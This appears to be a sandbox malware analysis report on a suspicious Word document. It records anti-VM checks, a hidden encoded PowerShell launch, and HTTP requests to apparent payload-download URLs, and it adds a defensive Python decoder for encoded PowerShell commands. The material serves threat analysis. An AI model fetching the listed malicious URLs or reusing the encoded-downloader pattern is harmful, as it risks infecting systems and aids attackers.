
Analysis

  • max time kernel
    59s
  • max time network
    11651379494s
  • resource
    win10

General

  • Target

    Docs_cdf406976d2e6c1e011078a5991ec178.suspected

  • Sample

    190926-pv3et13hza

  • SHA256

    21b2b7e92c8f7e405062af2ecca54753fb6fe4f93000d262cd1bae4f89c81310

Score
N/A

Malware Config

Signatures

  • Suspicious behavior: AddClipboardFormatListener
  • Suspicious use of SetWindowsHookEx
  • Drops Office document (4 IoCs)
  • Checks system information in the registry (likely anti-VM) (2 TTPs, 2 IoCs)
  • Enumerates system info in registry (2 TTPs, 5 IoCs)
  • Checks processor information in registry (likely anti-VM) (2 TTPs, 2 IoCs)
  • Suspicious use of WriteProcessMemory (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious behavior: EnumeratesProcesses

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cdf406976d2e6c1e011078a5991ec178.suspected.doc" /o ""
    1⤵
    • Drops Office document
    • Checks system information in the registry (likely anti-VM)
    • Enumerates system info in registry
    • Checks processor information in registry (likely anti-VM)
    PID:988
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3732
  • C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    1⤵
    PID:3844
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e …
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3812
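The encoded PowerShell argument is elided in this report, and decoding it is the first thing an analyst does with a process tree like the one above, because the URLs a maldoc downloader will contact are usually sitting in plain text once the base64 is undone. The helper below is an added example, not code from tria.ge or from the sample: it pulls the blob out of a command line (any unambiguous prefix of -EncodedCommand, so -e, -ec and -enc all work), decodes the base64 over UTF-16LE that the flag expects, unwraps one inner [Convert]::FromBase64String('...') layer, which goes one step beyond what the command line alone shows, and lists the URLs. The sample command line is constructed here; it is not the elided payload, and its URLs are copied from the report's network section so the output can be compared with what the sandbox recorded.

```python
"""Decode a `powershell -e <base64>` argument and list the URLs it carries (added helper)."""
import base64
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = "encodedcommand"

# URL matcher that stops before the next "http://", so '@'-joined URL lists split cleanly.
_URL = re.compile(r"https?://(?:(?!https?://)[^\s'\"<>)])+", re.I)
# One inner base64 layer of the kind [Convert]::FromBase64String('...') introduces.
_INNER = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def encode_command(script: str) -> str:
    """Build what -EncodedCommand expects: base64 over the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def encoded_argument(cmdline: str) -> Optional[str]:
    """Return the blob that follows -EncodedCommand (or any prefix of it), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and ENCODED_FLAG.startswith(flag):
            return tokens[i + 1]
    return None


def decode_encoded_command(blob: str) -> str:
    """Re-pad (some droppers strip the '='), then undo base64 and UTF-16LE."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def unwrap_inner_base64(script: str) -> List[str]:
    """Decode FromBase64String('...') literals one level down, choosing UTF-16LE or UTF-8."""
    layers: List[str] = []
    for match in _INNER.finditer(script):
        raw = base64.b64decode(match.group(1))
        candidates = []
        for enc in ("utf-16-le", "utf-8"):
            try:
                candidates.append(raw.decode(enc))
            except UnicodeDecodeError:
                pass
        if candidates:
            # Prefer the decoding with no NUL characters and the highest ASCII share.
            layers.append(max(candidates, key=lambda t: (
                "\x00" not in t, sum(c.isascii() for c in t) / max(len(t), 1))))
    return layers


def extract_urls(text: str) -> List[str]:
    """Unique URLs in order of appearance, list separators and trailing punctuation trimmed."""
    urls: List[str] = []
    for url in _URL.findall(text):
        url = url.rstrip("@.,;")
        if url not in urls:
            urls.append(url)
    return urls


def analyze(cmdline: str) -> dict:
    """Command line -> decoded script -> URLs from it and from one inner base64 layer."""
    blob = encoded_argument(cmdline)
    if blob is None:
        return {"script": None, "urls": []}
    script = decode_encoded_command(blob)
    return {"script": script,
            "urls": extract_urls("\n".join([script] + unwrap_inner_base64(script)))}


# Constructed sample, NOT the payload elided from the report: a benign stand-in that stores
# the two URLs the sandbox issued GETs for the way many maldoc droppers do ('@'-joined),
# plus one inner base64 layer naming a third host taken from the report's DNS section.
_INNER_LAYER = base64.b64encode(b"Write-Output 'http://barabooseniorhigh.com/'").decode("ascii")
SAMPLE_SCRIPT = (
    "$l='http://bloodybits.com/edwinjefferson.com/jx7/@http://www.majoristanbul.com/cgi-bin/1OF/'.Split('@');"
    "foreach($u in $l){Write-Output $u};"
    "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + _INNER_LAYER + "'))"
)
SAMPLE_CMDLINE = "powershell.exe -NoP -w hidden -e " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for url in analyze(SAMPLE_CMDLINE)["urls"]:
        print(url)
```

Feed `analyze()` the full command line as the sandbox recorded it; the flag scan skips unrelated switches such as -NoP and -w. The UTF-16LE step matters: decoding the blob as UTF-8 yields NUL-interleaved text that most URL regexes miss.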

Network

Flows (bytes and packets are sent / received):

  • 47.94.209.126:443  www.yanjiaozhan.com  382 B / 3.6kB  3 / 3 pkts
  • 52.109.12.23:443  nexus.officeapps.live.com  4.6kB / 10.1kB  12 / 8 pkts
  • 193.29.63.133:1688  kms8.msguides.com  524 B / 464 B  3 / 3 pkts
  • 52.109.76.30:443  nexusrules.officeapps.live.com  1.6kB / 9.9kB  4 / 4 pkts
  • 213.190.6.4:80  http://bloodybits.com/edwinjefferson.com/jx7/  87 B / 2.7kB  1 / 1 pkts
    HTTP Request: GET http://bloodybits.com/edwinjefferson.com/jx7/
    HTTP Response: 404 Not Found
  • 52.109.88.8:443  officeclient.microsoft.com  757 B / 23.1kB  3 / 4 pkts
  • 3.83.101.55:80  barabooseniorhigh.com  (no byte or packet counters recorded)
  • 94.73.147.19:80  http://www.majoristanbul.com/cgi-bin/1OF/  83 B / 1.5kB  1 / 1 pkts
    HTTP Request: GET http://www.majoristanbul.com/cgi-bin/1OF/
    HTTP Response: 404 Not Found
  • 10.0.0.255:137  (NetBIOS name-service broadcast)  1.3kB  13 pkts

DNS (all to 8.8.8.8:53, one query and one reply each; bytes are sent / received):

  • bloodybits.com → 213.190.6.4  74 B / 90 B
  • kms8.msguides.com → 193.29.63.133  77 B / 136 B
  • www.majoristanbul.com → 94.73.147.19  81 B / 111 B
  • barabooseniorhigh.com → 3.83.101.55  81 B / 97 B
  • officeclient.microsoft.com → 52.109.88.8  86 B / 209 B
  • nexus.officeapps.live.com → 52.109.12.23  85 B / 147 B
  • nexusrules.officeapps.live.com → 52.109.76.30  90 B / 155 B
  • www.bilgiegitimonline.com → no address in the recorded response  85 B / 146 B
  • www.yanjiaozhan.com → 47.94.209.126  79 B / 95 B

Triage note: the officeapps.live.com and officeclient.microsoft.com flows are Office's own service traffic, and the connection to kms8.msguides.com on 1688/TCP (the KMS activation port) is consistent with the SLUI.exe Action=AutoActivate task and SppExtComObj.exe in the process list rather than with the document. The activity worth following up is the two HTTP GETs to bloodybits.com and www.majoristanbul.com, both answered 404, so no second stage was retrieved in this run, together with the lookups and connections to barabooseniorhigh.com, www.bilgiegitimonline.com and www.yanjiaozhan.com, none of which is Office or licensing infrastructure.
